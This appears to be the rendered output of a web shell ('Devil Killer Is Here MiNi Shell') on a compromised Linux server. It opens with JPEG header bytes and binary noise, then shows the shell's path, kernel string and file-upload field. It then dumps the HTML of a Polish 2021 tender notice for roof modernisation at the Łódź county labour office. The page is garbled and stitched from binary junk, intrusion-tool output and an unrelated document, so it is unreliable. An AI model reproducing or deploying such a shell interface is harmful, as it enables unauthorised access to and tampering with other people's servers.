JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20210816/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20210816/0014924201-N-2021.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Modernizacja, uszczelnianie oraz uzyskanie powierzchni refleksyjnej na całej powierzchni dachu. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">POWIATOWY URZĄD PRACY W ŁODZI</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 101320436</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">ul. Milionowa 91</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Łódź</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">93-121</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">łódzkie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL711 - Miasto Łódź</span></h3> <h3 class="mb-0">1.5.7.) Numer telefonu: <span class="normal">422516500</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">przetargi@pup-lodz.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">https://lodz.praca.gov.pl/</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - jednostka sektora finansów publicznych - jednostka samorządu terytorialnego</span> </h3> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Inna działalność</span> </h3> <p class="mb-0"> Aktywizacja osób bezrobotnych </p> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Modernizacja, uszczelnianie oraz uzyskanie powierzchni refleksyjnej na całej powierzchni dachu. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-27b77fae-fc37-11eb-b885-f28f91688073</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2021/BZP 00149242</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2021-08-16</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2021/BZP 00002786/05/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Modernizacja, uszczelnianie oraz uzyskanie powierzchni refleksyjnej na całej powierzchni dachu.</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> http://pup.lodz1.sisco.info/?id=531 <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">1. W postępowaniu o udzielenie<br/>zamówienia komunikacja między Zamawiającym, a Wykonawcami odbywa się przy użyciu miniPortalu<br/>https://miniPortal.uzp.gov.pl/, platformy ePUAP adres elektronicznej skrzynki podawczej<br/>/PUPLODZ/SkrytkaESP oraz poczty elektronicznej e-mail: przetargi@pup-lodz.pl.</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">Wymagania techniczne i organizacyjne wysyłania i odbierania dokumentów elektronicznych,<br/>elektronicznych kopii dokumentów i oświadczeń oraz informacji przekazywanych przy ich użyciu zostały<br/>opisane w Instrukcji użytkowania systemu miniPortal oraz Regulaminie ePUAP.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h3 class="mb-0">3.15.) RODO (obowiązek informacyjny): <span class="normal">1.	Zgodnie z art. 13 i 14 rozporządzenia Parlamentu Europejskiego i Rady (UE) 2016/679 z dnia 27 kwietnia 2016 r. w sprawie ochrony osób fizycznych w związku <br/>z przetwarzaniem danych osobowych i w sprawie swobodnego przepływu takich danych oraz uchylenia dyrektywy 95/46/WE (ogólnego rozporządzenia o ochronie danych) – dalej RODO uprzejmie informujemy, że: <br/>1.1.	Administratorem Pani/Pana danych osobowych Powiatowy Urząd Pracy <br/>z siedzibą w Łodzi przy ul. Milionowej 91, kod pocztowy 93-121, nr telefonu: <br/>(42) 251-65-00.<br/>1.2.	Administrator wyznaczył inspektora ochrony danych osobowych, z którymi może się Pani/Pan skontaktować poprzez e-mail: iod@pup-lodz.pl. <br/>Z inspektorem ochrony danych można się kontaktować we wszystkich sprawach dotyczących przetwarzania danych osobowych przez Powiatowy Urząd Pracy <br/>w Łodzi oraz korzystania z praw związanych z przetwarzaniem danych.<br/>2.	Podanie danych osobowych jest warunkiem koniecznym do realizacji sprawy <br/>w Powiatowym Urzędzie Pracy w Łodzi.<br/>3.	Podstawą prawną do przetwarzania danych stanowi art. 6 ust. 1 lit. b i c oraz art. 10 RODO. Szczegółowe cele przetwarzania danych zostały wskazane w następujących przepisach:<br/>3.1.	ustawie z dnia 11 września 2019 r. –Prawo zamówień publicznych;<br/>3.2.	ustawie z dnia 23 kwietnia 1964 r. –Kodeks cywilny;<br/>3.3.	ustawie z dnia 27 sierpnia 2009 r. o finansach publicznych;<br/>3.4.	ustawie z dnia 29 września 1994 r. o rachunkowości<br/>4.	Pani/Pana dane będą przetwarzane w celu:<br/>4.1.	przeprowadzenia postępowania o udzielenie zamówienia publicznego <br/>i wyłonienie wykonawcy;<br/>4.2.	zawarcia umowy;<br/>4.3.	rozliczenia finansowo-księgowego.<br/>5.	Pani/Pana dane osobowe mogą być udostępniane podmiotom uprawnionym do ich otrzymywania na podstawie przepisów prawa lub umowy, w tym: podmiotom świadczącym usługi pocztowe, kurierskie usługi informacyjne, bankowe, ubezpieczeniowe, osobom i podmiotom zainteresowanym o udzielenie zamówienia publicznego, a także podmiotom korzystającym z Biuletynu Informacji Publicznej, Biuletynu Zamówień Publicznych, Bazy konkurencyjności oraz internetowej platformy zakupowej –eKatalogi, będącej w gestii Urzędu Zamówień Publicznych.<br/>6.	Ze względu na jawność postępowania o udzielenie zamówienia publicznego, odbiorcami Pani/Pana danych osobowych mogą być wszystkie zainteresowane osoby lub podmioty. Ograniczenie dostępu do danych może wystąpić jedynie w szczególnych przypadkach, jeśli jest to uzasadnione ochroną prywatności, interesem publicznym lub informacja stanowi tajemnicę przedsiębiorstwa.<br/>7.	Dane osobowe nie będą przekazywane do państw trzecich, na podstawie szczególnych regulacji prawnych, w tym umów międzynarodowych. <br/>8.	Dane osobowe będą przetwarzane, w tym przechowywane przez okres niezbędny <br/>do realizacji celów przetwarzania, jednak nie krócej niż przez okres określony przepisami prawa, w tym dla celów archiwalnych przez okres wynikający z ustawą <br/>z dnia 14 lipca 1983 r. o narodowym zasobie archiwalnym i archiwach (Dz. U. z 2020 r. poz. 164).<br/>9.	Posiada Pani/Pan prawo żądania dostępu do swoich danych osobowych, a także ich sprostowania (poprawiania). Przysługuje Pani/Panu także prawo do żądania usunięcia lub ograniczenia przetwarzania, a także sprzeciwu na przetwarzanie, <br/>przy czym przysługuje ono jedynie w sytuacji, jeżeli dalsze przetwarzanie nie jest niezbędne do wywiązania się przez Administratora z obowiązku prawnego i nie występują inne nadrzędne prawne podstawy przetwarzania.<br/>10.	Posiada Pani/Pan prawo do wniesienia skargi do Prezesa UODO (www.uodo.gov.pl) w razie uznania, że przetwarzanie danych przez Administratora narusza przepisy prawa.<br/>11.	Gdy podanie danych osobowych wynika z przepisów prawa, jest Pani/Pan zobowiązana(y) do ich podania. Konsekwencją niepodania danych osobowych będzie brak możliwości zawarcia umowy o udzielenie zamówienia publicznego<br/>12.	Dane nie będą przetwarzane w sposób zautomatyzowany, w tym również w formie profilowania.</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">ZA.261.4.2021</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> 1.	Przedmiotem niniejszego postępowania jest modernizacja, uszczelnianie oraz uzyskanie powierzchni refleksyjnej na całej powierzchni dachu budynku Powiatowego Urzędu Pracy w Łodzi.<br/>Zamówienie obejmuje: <br/>•	Przygotowanie podłoża- mycie ciśnieniowe oraz zamiatanie pokrycia papowego; usuniecie ewentualnych pęcherzy;<br/>•	Zabezpieczenie i obróbka naroży, dylatacji, obróbek kominków wentylacyjnych, miejsc styku z podłożem innych elementów konstrukcji zainstalowanych na dachu poprzez wklejenie taśm i siatek systemowych;<br/>•	Wykonanie warstwy podkładowej, zbrojonej na całej powierzchni dachu siatką techniczną (wzmacniającą),<br/>•	Wykonanie warstwy nawierzchniowo – ochronnej posiadającej refleksyjność świetlną nie mniejszą niż 86% i współczynnika SRI nie mniejszy niż 107, na całej powierzchni dachu,<br/>•	demontaż istniejącej instalacji odgromowej,<br/>•	montaż nowej instalacji odgromowej.<br/>2.	Szczegółowy opis przedmiotu zamówienia stanowi zał. nr 1 do SWZ oraz specyfikacji technicznej wykonania i odbioru robót. Zamawiający udostępnia także przedmiar robót.<br/>Zamawiający informuje, że przedmiotowy przedmiar robót Załączony do SWZ <br/>ma charakter dokumentu pomocniczego umożliwiającego Wykonawcom wyliczenie ceny za roboty budowlane stanowiące przedmiot zamówienia. Zawarte <br/>w przedmiarze robót zestawienia obrazują skalę robót budowlanych i stanowią pomoc w oszacowaniu zamówienia. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">45261900-3 - Naprawa i konserwacja dachów</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">45261220-2 - Malowanie dachów i inne roboty dotyczące okładzin</p> <p class="mb-0">45261420-4 - Uszczelnianie dachu</p> <p class="mb-0">45312311-0 - Montaż instalacji piorunochronnej</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">35 dni</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Zamawiający przyzna realizację zamówienia Wykonawcy, którego oferta<br/>zostanie uznana za najkorzystniejszą z punktu widzenia podanych w niniejszej SWZ kryteriach oraz<br/>odpowiada zasadom określonym w ustawie i spełnia wymagania określone w SWZ. Oceny ofert będzie dokonywała komisja przetargowa.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Gwarancja i rękojmia na wykonane roboty budowlane</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Nie</span></h3> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> (Numeracja zgodna z SWZ)6.4. zdolności technicznej lub zawodowej:<br/>Zamawiający uzna warunek za spełniony jeżeli Wykonawca wykaże, iż wykonał w okresie<br/>ostatnich pięciu lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia<br/>działalności jest krótszy - w tym okresie, co najmniej 1 robotę budowlaną z zakresu przedmiotu<br/>zamówienia, o wartości co najmniej 300 000,00 PLN brutto, z załączeniem dowodu, że dostawa<br/>została wykonana lub jest wykonywana należycie. 6.5. W przypadku wspólnego ubiegania się<br/>Wykonawców o udzielenie zamówienia lub polegania na zdolnościach podmiotów<br/>udostępniających zasoby ww. warunek oceniany będzie łącznie.<br/>6.6. W przypadku, gdy Wykonawca wykonywał w ramach jednego kontraktu/umowy większy<br/>zakres prac, dla potrzeb zamówienia powinien wyodrębnić i podać wartość roboty, o której<br/>mowa powyżej.<br/>6.7. Jeżeli Wykonawca wykazuje doświadczenie nabyte w ramach kontraktu<br/>(zamówienia/umowy) realizowanego przez wykonawców wspólnie ubiegających się o udzielenie<br/>zamówienia (konsorcjum), Zamawiający nie dopuszcza by Wykonawca polegał na<br/>doświadczeniu grupy wykonawców, której był członkiem, jeżeli faktycznie i konkretnie nie<br/>wykonywał wykazywanego zakresu prac. Zamawiający zastrzega możliwość zwrócenia się do<br/>wykonawcy o wyjaśnienia w zakresie faktycznie i konkretnie wykonywanego zakresu prac oraz<br/>przedstawienia stosownych dowodów np. umowy konsorcjum, z której wynika zakres<br/>obowiązków czy wystawionych przez wykonawcę faktur.<br/>6.8. Dla potrzeb oceny spełniania warunku określonego powyżej, jeśli wartość lub wartości<br/>zostaną podane w walutach innych niż PLN, Zamawiający przyjmie średni kurs danej waluty<br/>publikowany przez Narodowy Bank Polski w dniu publikacji ogłoszenia o zamówieniu w<br/>Biuletynie Zamówień Publicznych. Jeżeli w dniu publikacji ogłoszenia o zamówieniu w Biuletynie<br/>Zamówień Publicznych, Narodowy Bank Polski nie publikuje średniego kursu danej waluty, za<br/>podstawę przeliczenia przyjmuje się średni kurs waluty publikowany pierwszego dnia, po dniu<br/>publikacji ogłoszenia o zamówieniu w Biuletynie Zamówień Publicznych, w którym zostanie on<br/>opublikowany.<br/>6.9. Zamawiający zastrzega możliwość weryfikacji potwierdzenia należytego wykonania prac<br/>bezpośrednio u podmiotu, na rzecz którego były wykonane. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">Do oferty wykonawca zobowiązany jest dołączyć oświadczenie, o którym<br/>mowa w art. 125 ust. 1 ustawy Pzp, o spełnianiu warunków udziału w postępowaniu oraz o braku<br/>podstaw do wykluczenia z postępowania- zgodnie z załącznikiem nr 3 do SWZ. W przypadku<br/>wspólnego ubiegania się o zamówienie przez Wykonawców (dotyczy także wspólników spółki cywilnej)<br/>oświadczenie o którym mowa, w pkt. 2 SWZ składa każdy z Wykonawców wspólnie ubiegających się o<br/>zamówienie.<br/>Oświadczenie, o którym mowa w SWZ nie jest podmiotowym środkiem dowodowym i stanowi<br/>tymczasowy dowód potwierdzający brak podstaw wykluczenia i spełnianie warunków udziału w<br/>postępowaniu na dzień składania ofert.<br/>4. Zamawiający wzywa Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w<br/>wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków<br/>dowodowych, aktualnych na dzień ich złożenia.<br/>5. Podmiotowe środki dowodowe wymagane od Wykonawcy obejmują:<br/>6. Oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art.<br/>125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia z postępowania wskazanych przez<br/>Zamawiającego, stanowiące zał. nr 11 do niniejszej SWZ o których mowa w: art. 108 ust. 1 ustawy Pzp.<br/>7. Oświadczenie Wykonawcy w zakresie art. 108 ust 1. pkt. 5 ustawy Pzp, o braku przynależności do<br/>tej samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i<br/>konsumentów (Dz. U. z 2021 r. poz. 275)<br/>W przypadku Wykonawców wspólnie ubiegających się o zamówienie oświadczenie Wykonawcy o<br/>aktualności informacji zawartych w oświadczeniu o którym mowa w art. 125 ust. 1 ustawy Pzp składa<br/>każdy z tych Wykonawców (dotyczy również wspólników spółki cywilnej).- wzór stanowi zał. nr 6 do<br/>SWZ.<br/>8. Wykaz robót budowlanych zgodnie z zał. nr 7 do SWZ, wykonanych w okresie ostatnich 5 lat przed<br/>upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie,<br/>wraz z podaniem ich rodzaju, wartości, daty, miejsca wykonania i podmiotów, na rzecz, których roboty<br/>te zostały wykonane, z załączeniem dowodów określających czy te roboty budowlane zostały<br/>wykonane należycie, przy czym dowodami, o których mowa są: referencje bądź inne dokumenty<br/>sporządzone przez podmiot, na rzecz, którego roboty budowlane zostały wykonane, a jeżeli<br/>Wykonawca z przyczyn niezależnych od niego nie jest w stanie uzyskać tych dokumentów- inne<br/>odpowiednie dokumenty.<br/>9. Jeżeli Wykonawca powołuje się na doświadczenie w realizacji robót budowlanych, wykonywanych<br/>wspólnie z innymi Wykonawcami, wykaz, o którym mowa w pkt. 8, dotyczy robót budowlanych, w<br/>których wykonaniu Wykonawca ten bezpośrednio uczestniczył.<br/>10. W przypadku, gdy Wykonawca z uzasadnionej przyczyny nie może złożyć wymaganych przez<br/>Zamawiającego podmiotowych środków dowodowych, składa inne podmiotowe środki dowodowe,<br/>które w wystarczający sposób potwierdzają spełniania opisanego przez Zamawiającego warunku<br/>udziału w postępowaniu dotyczącego zdolności technicznej.<br/>11. Okres wyrażony w latach, o którym mowa w pkt. 8 SWZ liczy się wstecz od dnia, w którym upływa<br/>termin składania ofert.<br/>12. Zamawiający nie wzywa do złożenia podmiotowych środków dowodowych, jeżeli:<br/>12.1. może je uzyskać za pomocą bezpłatnych i ogólnodostępnych baz danych, w szczególności<br/>rejestrów publicznych w rozumieniu ustawy z dnia 17 lutego 2005 r. o informatyzacji działalności<br/>podmiotów realizujących zadania publiczne, o ile Wykonawca wskazał w oświadczeniu, o którym mowa<br/>w art. 125 ust. 1 ustawy Pzp dane umożliwiające dostęp do tych środków.<br/>13. Podmiotowym środkiem dowodowym jest oświadczenie, którego treść odpowiada zakresowi<br/>oświadczenia, o którym mowa w art. 125 ust. 1 ustawy Pzp.<br/>14. Wykonawca nie jest zobowiązany do złożenia podmiotowych środków dowodowych, które<br/>Zamawiający posiada, jeżeli Wykonawca wskaże te środki oraz potwierdzi ich prawidłowość i<br/>aktualność.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">Do oferty wykonawca zobowiązany jest dołączyć oświadczenie, o którym mowa w art. 125 ust. 1<br/>ustawy Pzp, o spełnianiu warunków udziału w postępowaniu oraz o braku podstaw do wykluczenia z<br/>postępowania- zgodnie z załącznikiem nr 3 do SWZ. W przypadku wspólnego ubiegania się o<br/>zamówienie przez Wykonawców (dotyczy także wspólników spółki cywilnej) oświadczenie o którym<br/>mowa, w pkt. 2 SWZ składa każdy z Wykonawców wspólnie ubiegających się o zamówienie.<br/>Oświadczenie, o którym mowa w SWZ nie jest podmiotowym środkiem dowodowym i stanowi<br/>tymczasowy dowód potwierdzający brak podstaw wykluczenia i spełnianie warunków udziału w<br/>postępowaniu na dzień składania ofert.<br/>Zamawiający wzywa Wykonawcę, którego oferta została najwyżej oceniona, do złożenia w<br/>wyznaczonym terminie, nie krótszym niż 5 dni od dnia wezwania, podmiotowych środków<br/>dowodowych, aktualnych na dzień ich złożenia.<br/>Podmiotowe środki dowodowe wymagane od Wykonawcy obejmują:<br/>Oświadczenie Wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym mowa w art.<br/>125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia z postępowania wskazanych przez<br/>Zamawiającego, stanowiące zał. nr 11 do niniejszej SWZ o których mowa w: art. 108 ust. 1 ustawy Pzp.<br/>Oświadczenie Wykonawcy w zakresie art. 108 ust 1. pkt. 5 ustawy Pzp, o braku przynależności do tej<br/>samej grupy kapitałowej, w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i<br/>konsumentów (Dz. U. z 2021 r. poz. 275)<br/>W przypadku Wykonawców wspólnie ubiegających się o zamówienie oświadczenie Wykonawcy o<br/>aktualności informacji zawartych w oświadczeniu o którym mowa w art. 125 ust. 1 ustawy Pzp składa każdy z tych Wykonawców (dotyczy również wspólników spółki cywilnej).- wzór stanowi 